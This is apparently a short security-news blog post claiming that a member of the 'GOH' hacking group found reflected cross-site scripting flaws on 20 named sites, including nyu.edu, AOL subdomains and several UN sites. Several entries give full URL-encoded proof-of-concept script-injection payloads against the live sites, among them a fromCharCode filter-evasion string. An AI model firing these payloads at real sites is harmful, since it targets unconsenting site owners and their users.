XSS vulnerability found in 20 High profile sites by GOH group

Sponsored Links


An Indian ethical hacker named Akshay AKA 0z0n3 beloging to the hacking crew called GOH (godofhackers) has found 20 high profiled sites vulnerable to non-persistant xss attacks.


The list of Vulnerable site with their Screenshots:

1. nyu.edu - vunl link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png status - patched

3. pakistanstockexchange.com - vunl link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com- official site of lil wayne - vunl link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i50.tinypic.com/zugubs.png

5.mercury-pc.com - vunl link - http://www.mercury-pc.com/search.php snap - http://i48.tinypic.com/b624qa.png

6.transcend.com - vunl link - http://www.transcend-info.com/Support/Search/index.asp snap - http://i47.tinypic.com/28letjc.png

7.bangladeshtradeinfo.com - vunl link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E snap - http://i49.tinypic.com/dzc68.png

8.defense.aol.com - vunllink - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i49.tinypic.com/6fpgeq.png

9.gov.aol.com - vunllink - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E snap - http://i47.tinypic.com/f0n59x.png

10.http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11.http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12.http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13.http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14.http://unu.edu - http://i39.tinypic.com/v8odw9.png

15.http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16.http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18.http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19.http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20.www.games.com - aolsubdomain - http://i47.tinypic.com/33z9v8m.png
Category:

Share this with Your friends:


About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.